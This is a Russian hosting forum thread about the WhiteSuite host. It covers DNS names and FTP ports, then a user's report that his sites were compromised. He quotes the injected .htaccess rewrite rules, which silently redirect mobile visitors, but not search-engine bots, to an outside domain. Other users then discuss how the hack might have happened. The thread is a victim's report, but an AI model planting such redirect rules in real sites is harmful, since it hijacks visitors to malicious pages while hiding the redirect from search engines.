WhiteSuite: хостинг на скоростной платформе NodeSquad!

bugsmoran
На сайте с 18.02.2010
223
konbvseo:
А ДНС че такие прописывать?
ns01.whitesuite.ru
ns02.whitesuite.ru

или
ns1.whitesuite.ru
ns2.whitesuite.ru

Щас у хостов мода пошла, в письмах ДНС не писать какие прописывать, где их потом искать хз, в панельке нашел ДНС и вот щас думаю какие прописывать

Не мода. Просто не догадались. Завтра же впишем. Спасибо за идею :)

K
На сайте с 15.03.2013
11
bugsmoran:
Не мода. Просто не догадались. Завтра же впишем. Спасибо за идею :)

Ну хоть кому то моя идея помогла, и я вам скажу хостеры, у большинства нету этих данных в письмах.

И еще укажите вписьме что надо использовать 22 порт а то я как то по старинке использовал 21 порт для входа через ФТП

[Удален]

У многих хостеров днс есть в письмах, но как показывает практика, к сожалению клиенты в письмах видят только ссылку на панель, логин и пароль, а за днс стучат в тикет. Увы, но каждый третий не читает письма до конца.

igrinov
На сайте с 09.01.2009
134

Вчера, на сайте моей матери (которая размещает свой сайт на данном хостинге) Касперский обнаружил вирус, вчера и сегодня целый день пытаюсь его удалить, но ничего не получается. Заметил что во всех файлах .htaccess на хостинге появился вот такой код

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|iemobile|nokia|ucweb|ucbrowser) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://m.fallsky.info/?19&source=178.63.200.193 [L,R=302]
сказал матери чтобы сменила пароли и больше их не хранила на компьютере.

Но каково же было мое удивление, когда и на своих сайтах на этом хостинге в файле .htaccess заметил то же самое (свои пароли храню только на бумажном носителе, к которому имею доступ только я).

Возникает вопрос, а не взломал ли кто-то хостера? При чем это могло произойти давно, т.к. давно не проверял файлы .htaccess

Персональный VPN/Socks сервер (https://cp.inferno.name/aff.php?aff=2419)
[umka]
На сайте с 25.05.2008
456

Надеюсь, у вас не возникло крамольных мыслей о дырявых плагинах и залитых шеллах )

Лог в помощь!
igrinov
На сайте с 09.01.2009
134
'[umka:
;11836723']Надеюсь, у вас не возникло крамольных мыслей о дырявых плагинах и залитых шеллах )

нет, возможно на сайте у матери и стоят какие то дырявые плагины, но мои сайты все на чистом html поэтому дыр быть не может

[umka]
На сайте с 25.05.2008
456
igrinov:
у матери сайт на WP, мои сайты все на чистом html поэтому дыр быть не может

Если взломан один сайт, то пролезть на другие сайты на том же аккаунте, как правило, не составляет труда.

igrinov
На сайте с 09.01.2009
134
'[umka:
;11836730']Если взломан один сайт, то пролезть на другие сайты на том же аккаунте, как правило, не составляет труда.

согласен, но аккаунты разные

[umka]
На сайте с 25.05.2008
456
igrinov:
согласен, но аккаунты разные

Ого…

Вообще, хостеров ломают крайне редко.

Попросите у службы поддержки логи заходов на фтп — наверняка найдёте там подозрительные айпишники.

P
На сайте с 28.04.2008
173

igrinov, разумеется у вас на компьютере и вирусов быть не может, которые могли бы украсть пароли?

KVM vps на ssd дисках от 3.49$ O_o http://friendhosting.net/vps.php Отзывы о Friendhosting.net тут

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий